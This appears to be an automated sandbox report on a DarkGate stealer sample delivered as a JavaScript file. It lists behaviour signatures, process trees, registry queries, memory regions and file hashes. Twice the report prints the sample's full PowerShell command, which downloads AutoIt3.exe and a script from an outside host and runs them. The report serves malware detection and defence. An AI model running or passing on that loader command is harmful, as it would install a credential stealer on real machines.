Malware Analysis Report

2024-11-30 11:22

Sample ID 231103-3zj51abc3t
Target 04112023_0757_online-package(0x1010010).js
SHA256 c1c99b9831d48df390c46dc373f8f5691364aa0118cc50484f0efcb2c8cad4df
Tags
darkgate ads5 stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c1c99b9831d48df390c46dc373f8f5691364aa0118cc50484f0efcb2c8cad4df

Threat Level: Known bad

The file 04112023_0757_online-package(0x1010010).js was found to be: Known bad.

Malicious Activity Summary

darkgate ads5 stealer

DarkGate

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-03 23:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-03 23:57

Reported

2023-11-03 23:59

Platform

win7-20231023-en

Max time kernel

119s

Max time network

123s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiegcubitm' -OutFile 'egcubitm.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'egcubitm.au3'"; Stop-Process -Name "WScript"

Network

N/A

Files

memory/2308-4-0x000000001B170000-0x000000001B452000-memory.dmp

memory/2308-5-0x0000000002410000-0x0000000002418000-memory.dmp

memory/2308-6-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

memory/2308-7-0x0000000002880000-0x0000000002900000-memory.dmp

memory/2308-8-0x0000000002880000-0x0000000002900000-memory.dmp

memory/2308-9-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

memory/2308-10-0x0000000002880000-0x0000000002900000-memory.dmp

memory/2308-11-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-03 23:57

Reported

2023-11-03 23:59

Platform

win10v2004-20231023-en

Max time kernel

146s

Max time network

152s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js

Signatures

DarkGate

stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 5104 created 616 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\system32\winlogon.exe

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\tepp\AutoIt3.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 5104 set thread context of 880 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\SysWOW64\WerFault.exe

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\tepp\AutoIt3.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\tepp\AutoIt3.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2892 wrote to memory of 4492 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 5104 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\tepp\AutoIt3.exe
PID 5104 wrote to memory of 4484 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 1748 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 880 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiegcubitm' -OutFile 'egcubitm.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'egcubitm.au3'"; Stop-Process -Name "WScript"

C:\tepp\AutoIt3.exe

"C:\tepp\AutoIt3.exe" egcubitm.au3

C:\Windows\SysWOW64\WerFault.exe

"C:\Windows\SysWOW64\WerFault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe

Network


Files

memory/4492-0-0x0000024B34B10000-0x0000024B34B32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d1s0vzjy.xqj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4492-10-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

memory/4492-11-0x0000024B34B60000-0x0000024B34B70000-memory.dmp

memory/4492-12-0x0000024B34B60000-0x0000024B34B70000-memory.dmp

memory/4492-13-0x0000024B34B60000-0x0000024B34B70000-memory.dmp

C:\tepp\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

C:\tepp\egcubitm.au3

MD5 3e44ad030b24484b630393ef879e0732
SHA1 1d6b6bbf4d131ba8112560e2c854a2fc486570be
SHA256 c2c39841c43ee502a8c6dc023cfb847e98a308f0e640d82d81351e41113fbbf2
SHA512 295094cd8ee23c6206eaacc9e056328711d4d43a70bd18499fcca8008269d49aefc2a765ac39ddc630634b7403f00fbd4bb705b58639e4d0806a500715fd1ad4

memory/5104-29-0x0000000000C00000-0x0000000001000000-memory.dmp

memory/5104-30-0x0000000003EE0000-0x000000000420A000-memory.dmp

memory/4484-37-0x0000000001260000-0x00000000012C6000-memory.dmp

memory/4484-38-0x0000000001260000-0x00000000012C6000-memory.dmp

memory/4492-39-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

memory/880-40-0x0000000000400000-0x0000000000465000-memory.dmp

memory/5104-41-0x0000000000C00000-0x0000000001000000-memory.dmp

memory/5104-43-0x0000000003EE0000-0x000000000420A000-memory.dmp

memory/880-42-0x0000000000400000-0x0000000000465000-memory.dmp

memory/880-44-0x0000000000400000-0x0000000000465000-memory.dmp